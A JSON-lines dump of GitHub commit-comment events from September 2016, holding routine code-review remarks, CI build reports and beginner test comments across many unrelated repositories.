{"id":"4629759405","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19205221,"position":null,"line":null,"path":null,"commit_id":"1e5f80c0dc73eb3fcff156f2d1458f21ec00c377","created_at":"2016-09-28T10:19:53Z","updated_at":"2016-09-28T10:19:53Z","body":"Regarding classes, feel free to suggest which Yii class to inherit from when doing a simple data object (that replaces an array). They are never saved to database, so it's not active record."}},"created_at":"2016-09-28T10:19:53Z"}
{"id":"4629760521","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore"},"payload":{"comment":{"id":19205226,"position":null,"line":null,"path":null,"commit_id":"49b690790f23955e06d0cfd6a765375015b91953","created_at":"2016-09-28T10:20:08Z","updated_at":"2016-09-28T10:20:08Z","body":"TeamCity NEventStore :: Core :: Build [Build 6.0.0-unstable.97](http://build.prxm.it:8813/viewLog.html?buildId=3681&buildTypeId=NEventStore_CI&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 250 Build time: 00:01:37"}},"created_at":"2016-09-28T10:20:08Z"}
{"id":"4629765574","type":"CommitCommentEvent","actor":{"login":"mugling"},"repo":{"name":"CleverRaven/Cataclysm-DDA"},"payload":{"comment":{"id":19205239,"position":null,"line":null,"path":null,"commit_id":"f80fe5e452a627174a83776f3cb4180d63f81b0b","created_at":"2016-09-28T10:21:16Z","updated_at":"2016-09-28T10:21:16Z","body":"4500+ lines of the game core updated outside of a PR? `astyle` has known bugs. This commit is almost certainly problematic. I'm going to look into this and post further."}},"created_at":"2016-09-28T10:21:16Z"}
{"id":"4629765867","type":"CommitCommentEvent","actor":{"login":"RichardBradley"},"repo":{"name":"marmelab/ng-admin"},"payload":{"comment":{"id":19205240,"position":null,"line":null,"path":null,"commit_id":"4d586e6e79a69e9db2444ec8d96506e807369335","created_at":"2016-09-28T10:21:21Z","updated_at":"2016-09-28T10:21:21Z","body":"What should \"plunkr\" demos use instead of these built files?\r\nSee https://github.com/marmelab/ng-admin/pull/1159#issuecomment-249883014"}},"created_at":"2016-09-28T10:21:21Z"}
{"id":"4629769333","type":"CommitCommentEvent","actor":{"login":"kmraditya"},"repo":{"name":"kmraditya/hello-world"},"payload":{"comment":{"id":19205245,"position":null,"line":null,"path":null,"commit_id":"b008685f3a5a7c235a29c688bff055e5adc7e76f","created_at":"2016-09-28T10:22:09Z","updated_at":"2016-09-28T10:22:09Z","body":"This is test repository for github\r\n![america](https://cloud.githubusercontent.com/assets/21975242/18909924/496aaaa0-8593-11e6-8ffa-efc22fb94d9a.jpg)\r\n"}},"created_at":"2016-09-28T10:22:09Z"}
{"id":"4629770462","type":"CommitCommentEvent","actor":{"login":"kmraditya"},"repo":{"name":"kmraditya/hello-world"},"payload":{"comment":{"id":19205247,"position":null,"line":null,"path":null,"commit_id":"b008685f3a5a7c235a29c688bff055e5adc7e76f","created_at":"2016-09-28T10:22:25Z","updated_at":"2016-09-28T10:22:25Z","body":"trying to learn github"}},"created_at":"2016-09-28T10:22:25Z"}
{"id":"4629773602","type":"CommitCommentEvent","actor":{"login":"jenshnielsen"},"repo":{"name":"UCL/rsd-engineeringcourse"},"payload":{"comment":{"id":19205254,"position":4,"line":28,"path":".travis.yml","commit_id":"0b033e81629960909792318ebad6f95f05cae033","created_at":"2016-09-28T10:23:07Z","updated_at":"2016-09-28T10:23:07Z","body":"https://github.com/DCPROGS/HJCFIT/pull/156/files"}},"created_at":"2016-09-28T10:23:07Z"}
{"id":"4629776226","type":"CommitCommentEvent","actor":{"login":"Kennytian"},"repo":{"name":"cvquant/react-native-instabug"},"payload":{"comment":{"id":19205256,"position":null,"line":null,"path":null,"commit_id":"9b464af9e1ea4d86e5a1777f8a0be36540eb2aa3","created_at":"2016-09-28T10:23:40Z","updated_at":"2016-09-28T10:23:40Z","body":"Please RP to me, thank you!"}},"created_at":"2016-09-28T10:23:40Z"}
{"id":"4629777127","type":"CommitCommentEvent","actor":{"login":"karlzhang-hhg"},"repo":{"name":"karlzhang-hhg/IKPCA"},"payload":{"comment":{"id":19205257,"position":null,"line":null,"path":null,"commit_id":"e4efcd66ad2380f1482279980ab91b030fd2eb9c","created_at":"2016-09-28T10:23:53Z","updated_at":"2016-09-28T10:23:53Z","body":"Show very promising result. The variational sources are clear, even though the shape is distorted a little bit."}},"created_at":"2016-09-28T10:23:53Z"}
{"id":"4629777601","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19205260,"position":null,"line":null,"path":null,"commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T10:24:00Z","updated_at":"2016-09-28T10:24:00Z","body":"https://yadi.sk/i/LViP9E0BvqVX9 ширину экрана уменьшили, шапка выползает"}},"created_at":"2016-09-28T10:24:00Z"}
{"id":"4629778093","type":"CommitCommentEvent","actor":{"login":"bonkey"},"repo":{"name":"zalando-incubator/atlas-ios"},"payload":{"comment":{"id":19205263,"position":null,"line":null,"path":null,"commit_id":"ade7e602c1d5c36cba0bd2e83a83792398dfb09c","created_at":"2016-09-28T10:24:05Z","updated_at":"2016-09-28T10:24:05Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Testing 1,2,3](https://trello.com/c/xVV7sOEW/1-testing-1-2-3)"}},"created_at":"2016-09-28T10:24:05Z"}
{"id":"4629787075","type":"CommitCommentEvent","actor":{"login":"j1225335417"},"repo":{"name":"j1225335417/IOSDemo"},"payload":{"comment":{"id":19205276,"position":null,"line":null,"path":null,"commit_id":"4980a6d29d90eb4d4b7f237a01279b91d61a3e0b","created_at":"2016-09-28T10:26:04Z","updated_at":"2016-09-28T10:26:04Z","body":"111"}},"created_at":"2016-09-28T10:26:04Z"}
{"id":"4629787919","type":"CommitCommentEvent","actor":{"login":"j1225335417"},"repo":{"name":"j1225335417/IOSDemo"},"payload":{"comment":{"id":19205277,"position":1,"line":1,"path":"README.md","commit_id":"4980a6d29d90eb4d4b7f237a01279b91d61a3e0b","created_at":"2016-09-28T10:26:14Z","updated_at":"2016-09-28T10:26:14Z","body":"qww"}},"created_at":"2016-09-28T10:26:14Z"}
{"id":"4629789345","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205279,"position":6,"line":6,"path":"index.html","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:26:33Z","updated_at":"2016-09-28T10:26:33Z","body":"у нас приложение? зачем запрещаем масштабирование?"}},"created_at":"2016-09-28T10:26:33Z"}
{"id":"4629791039","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19205282,"position":null,"line":null,"path":null,"commit_id":"6a8c5ddb32f0452cd0bdfcabd4b91375661ecfe0","created_at":"2016-09-28T10:26:57Z","updated_at":"2016-09-28T10:26:57Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 6.0.0-unstable.84](http://build.prxm.it:8813/viewLog.html?buildId=3682&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 77 Build time: 00:02:46"}},"created_at":"2016-09-28T10:26:57Z"}
{"id":"4629791046","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19205281,"position":null,"line":null,"path":null,"commit_id":"6a8c5ddb32f0452cd0bdfcabd4b91375661ecfe0","created_at":"2016-09-28T10:26:57Z","updated_at":"2016-09-28T10:26:57Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 6.0.0-unstable.84](http://build.prxm.it:8813/viewLog.html?buildId=3682&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 77 Build time: 00:02:46"}},"created_at":"2016-09-28T10:26:57Z"}
{"id":"4629794538","type":"CommitCommentEvent","actor":{"login":"Cat7373"},"repo":{"name":"Cat7373/Anti-AntiCheat-MOD"},"payload":{"comment":{"id":19205285,"position":2,"line":2,"path":"src_999.999.999/main/java/org/cat73/antianticheat/AntiAntiCheat.java","commit_id":"5b314cb3901552fe4dff38032b411f3c4a210c22","created_at":"2016-09-28T10:27:42Z","updated_at":"2016-09-28T10:27:42Z","body":"在以前的内个版本，这样写就足够了。。\r\n现在新出的3.x这货没法破解"}},"created_at":"2016-09-28T10:27:42Z"}
{"id":"4629796218","type":"CommitCommentEvent","actor":{"login":"sherlockhoatszx"},"repo":{"name":"linanqiu/word2vec-sentiments"},"payload":{"comment":{"id":19205288,"position":null,"line":null,"path":null,"commit_id":"44d024047705ca80eae2cbffb9175cee7e60fbbb","created_at":"2016-09-28T10:28:06Z","updated_at":"2016-09-28T10:28:06Z","body":"when i model['TRAIN_NEG_0']  . It report key error as you mentioned: KeyError: 'TRAIN_NEG_0' did you got the solution yet? "}},"created_at":"2016-09-28T10:28:06Z"}
{"id":"4629796685","type":"CommitCommentEvent","actor":{"login":"mat-mr"},"repo":{"name":"mat-mr/crescer-2016-2"},"payload":{"comment":{"id":19205291,"position":null,"line":null,"path":null,"commit_id":"50aaf645fd0105e60fdea6efdeddc599813c6de6","created_at":"2016-09-28T10:28:12Z","updated_at":"2016-09-28T10:28:12Z","body":"Ontem tive que abandonar o código prematuramente. Vou dar push em umas alterações que fiz em máquina local e peço que avalie novamente.\r\nTY!"}},"created_at":"2016-09-28T10:28:12Z"}
{"id":"4629797968","type":"CommitCommentEvent","actor":{"login":"dan-gamble"},"repo":{"name":"onespacemedia/project-template"},"payload":{"comment":{"id":19205292,"position":46,"line":89,"path":"hooks/post_gen_project.sh","commit_id":"e8366623b9bd09428a6ebdae5dc4829e64c50e7d","created_at":"2016-09-28T10:28:29Z","updated_at":"2016-09-28T10:28:29Z","body":"Good shout, pushed https://github.com/onespacemedia/project-template/commit/bcb5cd87744781f6b919c5f5b0ef272c69529e1a"}},"created_at":"2016-09-28T10:28:29Z"}
{"id":"4629799483","type":"CommitCommentEvent","actor":{"login":"nicegdhj"},"repo":{"name":"nicegdhj/show-me-the-code"},"payload":{"comment":{"id":19205298,"position":40,"line":38,"path":"README.md","commit_id":"98b9d7b0c8b709ef68186c2fa4c86439e39081f2","created_at":"2016-09-28T10:28:51Z","updated_at":"2016-09-28T10:28:51Z","body":"sorry 我以为修改编辑只在自己clone的本地文档上进行，因为我看到的教程是说pull 之后被接受才会被同步到原文档。这是一个误操作  抱歉"}},"created_at":"2016-09-28T10:28:51Z"}
{"id":"4629800082","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205299,"position":15,"line":15,"path":"index.html","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:28:58Z","updated_at":"2016-09-28T10:28:58Z","body":"что за странные модификаторы в разметке? Хочется делать по сетке — используй миксование на уровне классов. Сама идея сеток — круто."}},"created_at":"2016-09-28T10:28:58Z"}
{"id":"4629801861","type":"CommitCommentEvent","actor":{"login":"hashhar"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19205301,"position":null,"line":null,"path":null,"commit_id":"eb4b50649821d61df0e6d6823b20c94927ab2996","created_at":"2016-09-28T10:29:21Z","updated_at":"2016-09-28T10:29:21Z","body":"Thanks! I'm sorry I couldn't do this. I did add the `IExtensionManagementService` to the constructor but was calling it's functions in places where they couldn't be called. Thanks for showing me how it all fits together. :+1: "}},"created_at":"2016-09-28T10:29:21Z"}
{"id":"4629805549","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205304,"position":29,"line":29,"path":"index.html","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:30:12Z","updated_at":"2016-09-28T10:30:12Z","body":"зачем столько лишних обёрток?"}},"created_at":"2016-09-28T10:30:12Z"}
{"id":"4629807495","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205308,"position":31,"line":31,"path":"index.html","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:30:35Z","updated_at":"2016-09-28T10:30:35Z","body":"обёртка, причём блочная — зачем?"}},"created_at":"2016-09-28T10:30:35Z"}
{"id":"4629808114","type":"CommitCommentEvent","actor":{"login":"anaguaradam"},"repo":{"name":"anaguaradam/prueba"},"payload":{"comment":{"id":19205310,"position":2,"line":2,"path":"README.md","commit_id":"e701294767d2ba398655bac9f24fe403f49e4309","created_at":"2016-09-28T10:30:44Z","updated_at":"2016-09-28T10:30:44Z","body":"Hola mundo"}},"created_at":"2016-09-28T10:30:44Z"}
{"id":"4629808495","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205312,"position":31,"line":31,"path":"index.html","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:30:49Z","updated_at":"2016-09-28T10:30:49Z","body":"Это декоративное или концертное изображение?"}},"created_at":"2016-09-28T10:30:49Z"}
{"id":"4629809809","type":"CommitCommentEvent","actor":{"login":"sftblw"},"repo":{"name":"sku-coderface/sku-coderface.github.io"},"payload":{"comment":{"id":19205314,"position":null,"line":null,"path":null,"commit_id":"973ab623f087d2d6b3e2fb9a3c6b1d64a4268e99","created_at":"2016-09-28T10:31:08Z","updated_at":"2016-09-28T10:31:08Z","body":"*weg*rae"}},"created_at":"2016-09-28T10:31:08Z"}
{"id":"4629811150","type":"CommitCommentEvent","actor":{"login":"dreammed"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19205316,"position":null,"line":null,"path":null,"commit_id":"40d8547c346cd23ecdce9d537dd456545805c399","created_at":"2016-09-28T10:31:26Z","updated_at":"2016-09-28T10:31:26Z","body":"i will check good capture "}},"created_at":"2016-09-28T10:31:26Z"}
{"id":"4629811275","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205317,"position":40,"line":40,"path":"index.html","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:31:28Z","updated_at":"2016-09-28T10:31:28Z","body":"это по семантике вообще кнопка должна быть..."}},"created_at":"2016-09-28T10:31:28Z"}
{"id":"4629811820","type":"CommitCommentEvent","actor":{"login":"Minimata"},"repo":{"name":"Minimata/WebGl"},"payload":{"comment":{"id":19205318,"position":73,"line":81,"path":"planet/js/scene.js","commit_id":"e07072c4298da68209d785ca8b83618293062f85","created_at":"2016-09-28T10:31:35Z","updated_at":"2016-09-28T10:31:35Z","body":"there's a `console.exception` apparently but it's not standard.\r\n[here](https://developer.mozilla.org/fr/docs/Web/API/Console/erreur) and [there](https://getfirebug.com/wiki/index.php/Console.exception)"}},"created_at":"2016-09-28T10:31:35Z"}
{"id":"4629811980","type":"CommitCommentEvent","actor":{"login":"GaborLeskoFlach"},"repo":{"name":"GaborLeskoFlach/CharityFundPool"},"payload":{"comment":{"id":19205319,"position":null,"line":null,"path":null,"commit_id":"ff1fa77caa332085f262651763e49bb219d2817b","created_at":"2016-09-28T10:31:38Z","updated_at":"2016-09-28T10:31:38Z","body":"all good"}},"created_at":"2016-09-28T10:31:38Z"}
{"id":"4629812482","type":"CommitCommentEvent","actor":{"login":"anaguaradam"},"repo":{"name":"anaguaradam/prueba"},"payload":{"comment":{"id":19205323,"position":1,"line":1,"path":"README.md","commit_id":"e701294767d2ba398655bac9f24fe403f49e4309","created_at":"2016-09-28T10:31:44Z","updated_at":"2016-09-28T10:31:44Z","body":"Prueba"}},"created_at":"2016-09-28T10:31:44Z"}
{"id":"4629812847","type":"CommitCommentEvent","actor":{"login":"albertsmuktupavels"},"repo":{"name":"tista500/Adapta"},"payload":{"comment":{"id":19205324,"position":null,"line":null,"path":null,"commit_id":"16a8c04419f73872b0cc567ff7c0c609ee25f3d5","created_at":"2016-09-28T10:31:49Z","updated_at":"2016-09-28T10:31:49Z","body":"Ok, but can you list problems you did see?"}},"created_at":"2016-09-28T10:31:49Z"}
{"id":"4629813036","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205325,"position":51,"line":51,"path":"index.html","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:31:52Z","updated_at":"2016-09-28T10:31:52Z","body":"опять лишняя обёртка"}},"created_at":"2016-09-28T10:31:52Z"}
{"id":"4629813663","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205327,"position":51,"line":51,"path":"index.html","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:32:01Z","updated_at":"2016-09-28T10:32:01Z","body":"это не кнопка, а ссылка"}},"created_at":"2016-09-28T10:32:01Z"}
{"id":"4629817127","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19205332,"position":51,"line":126,"path":"src/PrimeTower.cpp","commit_id":"afd91bfd2e790c74e90f584eb9c10ae064b94ab9","created_at":"2016-09-28T10:32:49Z","updated_at":"2016-09-28T10:32:49Z","body":"Code style: Lowercase camel caps for function names."}},"created_at":"2016-09-28T10:32:49Z"}
{"id":"4629817325","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205333,"position":55,"line":55,"path":"index.html","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:32:52Z","updated_at":"2016-09-28T10:32:52Z","body":"`<br>` недопустимы тут"}},"created_at":"2016-09-28T10:32:52Z"}
{"id":"4629817972","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205337,"position":55,"line":55,"path":"index.html","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:33:01Z","updated_at":"2016-09-28T10:33:01Z","body":"зачем модификатор?"}},"created_at":"2016-09-28T10:33:01Z"}
{"id":"4629818402","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19205338,"position":64,"line":180,"path":"src/PrimeTower.cpp","commit_id":"afd91bfd2e790c74e90f584eb9c10ae064b94ab9","created_at":"2016-09-28T10:33:07Z","updated_at":"2016-09-28T10:33:07Z","body":"Code style: Lowercase camel caps for function names."}},"created_at":"2016-09-28T10:33:07Z"}
{"id":"4629818445","type":"CommitCommentEvent","actor":{"login":"chaser-at-its"},"repo":{"name":"retyped/react-notification-system-tsd-ambient"},"payload":{"comment":{"id":19205339,"position":null,"line":null,"path":null,"commit_id":"d8c0c92a42b60d8928e95af8b084433d6a6c7d5c","created_at":"2016-09-28T10:33:08Z","updated_at":"2016-09-28T10:33:08Z","body":"please"}},"created_at":"2016-09-28T10:33:08Z"}
{"id":"4629820474","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205346,"position":59,"line":59,"path":"index.html","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:33:36Z","updated_at":"2016-09-28T10:33:36Z","body":"модификатор на каждое свойство?"}},"created_at":"2016-09-28T10:33:36Z"}
{"id":"4629820766","type":"CommitCommentEvent","actor":{"login":"Capaverde"},"repo":{"name":"saniv/text"},"payload":{"comment":{"id":19205347,"position":null,"line":null,"path":null,"commit_id":"968dc69baf5b44832533f41e84ad43617f0b2162","created_at":"2016-09-28T10:33:40Z","updated_at":"2016-09-28T10:33:40Z","body":"How would you recommend me to learn Cyrillic?"}},"created_at":"2016-09-28T10:33:40Z"}
{"id":"4629822495","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19205353,"position":null,"line":null,"path":null,"commit_id":"25d30e342aee733e207933f84fbee7a6f97a1b02","created_at":"2016-09-28T10:34:04Z","updated_at":"2016-09-28T10:34:04Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 276](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1250&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **SUCCESS**\nSummary: Running Build time: 00:27:56"}},"created_at":"2016-09-28T10:34:04Z"}
{"id":"4629822630","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19205355,"position":null,"line":null,"path":null,"commit_id":"801e45d5cc7842a5ac35275df1027a80c7ed7cda","created_at":"2016-09-28T10:34:06Z","updated_at":"2016-09-28T10:34:06Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 277](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1251&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-28T10:34:06Z"}
{"id":"4629822816","type":"CommitCommentEvent","actor":{"login":"goodbytes23"},"repo":{"name":"moleisking/SAM"},"payload":{"comment":{"id":19205357,"position":null,"line":null,"path":null,"commit_id":"4b748139fce911da21abbf4dede080d0f6f0e9d9","created_at":"2016-09-28T10:34:08Z","updated_at":"2016-09-28T10:34:08Z","body":"When you register, isn't your city and current place the same?\r\nNah, fuck ids, i user artificial intelligence to find what data belongs to who. Of course Sherlock, how otherwise :)\r\nNot yet. Let finish this and not slow down the process, other wise moving it all to mongo right now will take more time and delay."}},"created_at":"2016-09-28T10:34:08Z"}
{"id":"4629824147","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205358,"position":60,"line":60,"path":"index.html","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:34:27Z","updated_at":"2016-09-28T10:34:27Z","body":"с отступами беда совсем"}},"created_at":"2016-09-28T10:34:27Z"}
{"id":"4629826856","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205364,"position":63,"line":63,"path":"index.html","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:35:07Z","updated_at":"2016-09-28T10:35:07Z","body":"контентное изображение? тем более без указания размеров..."}},"created_at":"2016-09-28T10:35:07Z"}
{"id":"4629827344","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19205366,"position":8,"line":26,"path":"src/PrimeTower.h","commit_id":"1a2ba63c748eca0d82f04ab3eccdedb089260d8a","created_at":"2016-09-28T10:35:13Z","updated_at":"2016-09-28T10:35:13Z","body":"You mean \"Precomputed\"? Pre-compilation normally refers to the step of applying macros and patches."}},"created_at":"2016-09-28T10:35:13Z"}
{"id":"4629827968","type":"CommitCommentEvent","actor":{"login":"goodbytes23"},"repo":{"name":"moleisking/SAM"},"payload":{"comment":{"id":19205367,"position":null,"line":null,"path":null,"commit_id":"4b748139fce911da21abbf4dede080d0f6f0e9d9","created_at":"2016-09-28T10:35:20Z","updated_at":"2016-09-28T10:35:20Z","body":"Anyway, again about the coordinates, your code was doing that, giving the same to both. But its easy to change if you wanna set two on the same registration."}},"created_at":"2016-09-28T10:35:20Z"}
{"id":"4629829320","type":"CommitCommentEvent","actor":{"login":"avsej"},"repo":{"name":"couchbaselabs/java-dcp-client"},"payload":{"comment":{"id":19205370,"position":21,"line":48,"path":"src/main/java/com/couchbase/client/dcp/message/DcpGetPartitionSeqnosRequest.java","commit_id":"14fa589b35e0a924bee1e0068b41b9669ad45db0","created_at":"2016-09-28T10:35:39Z","updated_at":"2016-09-28T10:35:39Z","body":"fixed"}},"created_at":"2016-09-28T10:35:39Z"}
{"id":"4629829426","type":"CommitCommentEvent","actor":{"login":"ibretus"},"repo":{"name":"ibretus/webpage"},"payload":{"comment":{"id":19205371,"position":null,"line":null,"path":null,"commit_id":"da72f78faeb9d0d876562c834cf31a07998745d0","created_at":"2016-09-28T10:35:41Z","updated_at":"2016-09-28T10:35:41Z","body":"cname"}},"created_at":"2016-09-28T10:35:41Z"}
{"id":"4629829744","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19205372,"position":null,"line":null,"path":null,"commit_id":"51154c98f536e3a98d10ebc8d1118cfb7af0fec3","created_at":"2016-09-28T10:35:45Z","updated_at":"2016-09-28T10:35:45Z","body":"develop (macumber) - i386-Windows-7-VisualStudio-12: OK (2413 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-51154c98f536e3a98d10ebc8d1118cfb7af0fec3-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-51154c98f536e3a98d10ebc8d1118cfb7af0fec3-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.57%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T10:35:45Z"}
{"id":"4629829962","type":"CommitCommentEvent","actor":{"login":"rascarlo"},"repo":{"name":"TilesLocalization/resources"},"payload":{"comment":{"id":19205373,"position":null,"line":null,"path":null,"commit_id":"6a4f329a6ef06d43f7e8c1bb0b38ea24dd54c0b6","created_at":"2016-09-28T10:35:47Z","updated_at":"2016-09-28T10:35:47Z","body":"@marci4 no problem at all, thanks"}},"created_at":"2016-09-28T10:35:47Z"}
{"id":"4629830683","type":"CommitCommentEvent","actor":{"login":"javafreak88"},"repo":{"name":"orlovskyjavaprofi/Boquet-Manager"},"payload":{"comment":{"id":19205375,"position":null,"line":null,"path":null,"commit_id":"485494896adaeab9ba8758a05369c0ff0c29d133","created_at":"2016-09-28T10:35:57Z","updated_at":"2016-09-28T10:35:57Z","body":"Awesome commit. Keep up the good work, looking forward to future releases!!!"}},"created_at":"2016-09-28T10:35:57Z"}
{"id":"4629830735","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205376,"position":104,"line":104,"path":"index.html","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:35:58Z","updated_at":"2016-09-28T10:35:58Z","body":"а где наш самбист для отправки формы?"}},"created_at":"2016-09-28T10:35:58Z"}
{"id":"4629834982","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205384,"position":99,"line":99,"path":"index.html","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:36:57Z","updated_at":"2016-09-28T10:36:57Z","body":"по семантике это два элемента — заголовок и подзаголовок (или параграф хотя бы), никак не один. Тем более никаких `<br>`!"}},"created_at":"2016-09-28T10:36:57Z"}
{"id":"4629835139","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19205385,"position":8,"line":27,"path":"resources/definitions/ultimaker.def.json","commit_id":"1f830e68bb6f6def28e8f310cea44243f21527ee","created_at":"2016-09-28T10:36:59Z","updated_at":"2016-09-28T10:36:59Z","body":"Shouldn't this be \"prime_tower_size / 2\" resp. \"machine_depth - prime_tower_size / 2\"?"}},"created_at":"2016-09-28T10:36:59Z"}
{"id":"4629838125","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205391,"position":63,"line":63,"path":"index.html","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:37:40Z","updated_at":"2016-09-28T10:37:40Z","body":"ну и называть изображения можно более адекватно)"}},"created_at":"2016-09-28T10:37:40Z"}
{"id":"4629840096","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205393,"position":117,"line":117,"path":"index.html","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:38:06Z","updated_at":"2016-09-28T10:38:06Z","body":"это заголовок, а не просто див"}},"created_at":"2016-09-28T10:38:06Z"}
{"id":"4629842887","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205405,"position":118,"line":118,"path":"index.html","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:38:45Z","updated_at":"2016-09-28T10:38:45Z","body":"больше смахивает на список или нав нежели безличный див)"}},"created_at":"2016-09-28T10:38:45Z"}
{"id":"4629849767","type":"CommitCommentEvent","actor":{"login":"Cronick"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":19205419,"position":null,"line":null,"path":null,"commit_id":"1d0aad00edb3e961026ceb1fc278a9e9f8772ac5","created_at":"2016-09-28T10:40:18Z","updated_at":"2016-09-28T10:40:18Z","body":"Include changes to README.md also, cause I'm not using Docker myself, so don't know anything about it."}},"created_at":"2016-09-28T10:40:18Z"}
